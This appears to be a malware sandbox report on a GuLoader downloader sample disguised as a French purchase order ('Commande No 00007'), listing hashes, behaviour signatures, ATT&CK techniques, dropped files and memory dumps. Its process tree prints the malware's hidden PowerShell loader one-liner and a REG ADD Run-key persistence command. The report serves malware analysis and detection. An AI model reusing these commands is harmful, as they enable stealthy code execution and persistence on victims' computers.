Overview

overview

10

Static

static

3

Commande N...on.exe

windows7-x64

10

Commande N...on.exe

windows10-2004-x64

6

unvolubly/...ng.ps1

windows7-x64

8

unvolubly/...ng.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    121s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    26-04-2024 05:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe

  • Size

    548KB

  • MD5

    edeb34f392872f3c9e220bc9dcf9ba86

  • SHA1

    e9fb6ff7cd47ec7b08391f4c1ecc1e684bf28ff7

  • SHA256

    39e37a6736984b617a47818ffdbd202199c75f769821d4939f1d61dff621098d

  • SHA512

    f33bc39692838cc94ae0ed6aedddfcecb8fd564de6de0d81a258ece57eba04cb7820f1fe834e48b4e0cbce95409449514bb645e69584ad62e0439fea306af424

  • SSDEEP

    12288:47YvE3TaaFpfEwmgfwwQxeoKGaGsIMcgLvlU2eZysZMNue:bENj7JgaRe0VN9

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
    "C:\Users\Admin\AppData\Local\Temp\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2924
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\Admin\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
        3⤵
          PID:2244
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          3⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of WriteProcessMemory
          PID:2764
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2532
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
              5⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:2840

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
      Filesize

      1KB

      MD5

      a266bb7dcc38a562631361bbf61dd11b

      SHA1

      3b1efd3a66ea28b16697394703a72ca340a05bd5

      SHA256

      df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

      SHA512

      0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      bd0bd8515a99a8ce285981a69ec62902

      SHA1

      a56bae9eb27112179b07e8897ef1ed9584351201

      SHA256

      a619dad6a4e58b650c945c828bcf904e18a92ce027a32a711df1f398df414ee8

      SHA512

      cad76875fa51112e06b6f8e023f5661b7675e9277359c143fe37aa9bf87f8d2e622c8b540e48e8125e0022ede8d49e1dd31f497b480262b3eaf3bb72947ac252

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
      Filesize

      242B

      MD5

      d532009cc6407d0275bd6617f74b36d6

      SHA1

      07c80aa06ce7269ff8b51e87a366569d552b131b

      SHA256

      e00a53dba5009854239b3b305f478400dfef387d81baec7c73b48d89b0509608

      SHA512

      bf63aa66d3c7eea258829ab123390a27b5cb9033b03d9d0cabdeeaa40d2a76b9914abd4a7673e66f32cd5d2e61372c89f79b6bba405fe64f12eed56d90611a57

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\Tar7332.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      Download Submit
    • C:\Users\Admin\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art
      Filesize

      56KB

      MD5

      19779840eecfc141420a08cb9a741962

      SHA1

      0f0a168bc292914da146f667557ff5f07b0f5ae5

      SHA256

      de1fc8dc64b49c5ae8c2c9c45e7dd4d2aa154f845e99a8e8fa08b5abf23d38a7

      SHA512

      d3be08e433f93bafc5d53ea6e91c53e01d755bf1c61e4006aa184da35644b343bd72d0ddbee9820db107c2df212dc4a51a4e06ebf3cf6c1e45ed250f2b383723

      Download Submit
    • C:\Users\Admin\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Raciality.Fly
      Filesize

      331KB

      MD5

      4fef7ec4aa88c70e0e50af8288552883

      SHA1

      93fb76eb5d63d8bd92cb962e8f6ca7c8e7ae5950

      SHA256

      286b9df7b42e7f021bb5eebe1b6e00d6178f01a4b308244cabfd955cd91b5d60

      SHA512

      9f386415243a791b58853c00c378aa57d3aa69f3e690e452220da92d5b4888a0c35099b20ebc9672b0797bcd58091fca8d1f0bd75a616b164896531b8206b1cb

      Download Submit
    • memory/2764-21-0x0000000077BC0000-0x0000000077D69000-memory.dmp
      Filesize

      1.7MB

      Download
    • memory/2764-129-0x0000000001870000-0x0000000006E9F000-memory.dmp
      Filesize

      86.2MB

      Download
    • memory/2764-131-0x0000000077DB0000-0x0000000077E86000-memory.dmp
      Filesize

      856KB

      Download
    • memory/2764-23-0x0000000077DB0000-0x0000000077E86000-memory.dmp
      Filesize

      856KB

      Download
    • memory/2764-22-0x0000000077DE6000-0x0000000077DE7000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2788-13-0x0000000002850000-0x0000000002890000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2788-20-0x0000000077DB0000-0x0000000077E86000-memory.dmp
      Filesize

      856KB

      Download
    • memory/2788-19-0x0000000002850000-0x0000000002890000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2788-18-0x00000000744B0000-0x0000000074A5B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2788-17-0x0000000077BC0000-0x0000000077D69000-memory.dmp
      Filesize

      1.7MB

      Download
    • memory/2788-16-0x0000000006760000-0x000000000BD8F000-memory.dmp
      Filesize

      86.2MB

      Download
    • memory/2788-15-0x0000000002C60000-0x0000000002C64000-memory.dmp
      Filesize

      16KB

      Download
    • memory/2788-8-0x0000000002850000-0x0000000002890000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2788-10-0x0000000002850000-0x0000000002890000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2788-9-0x00000000744B0000-0x0000000074A5B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2788-7-0x00000000744B0000-0x0000000074A5B000-memory.dmp
      Filesize

      5.7MB

      Download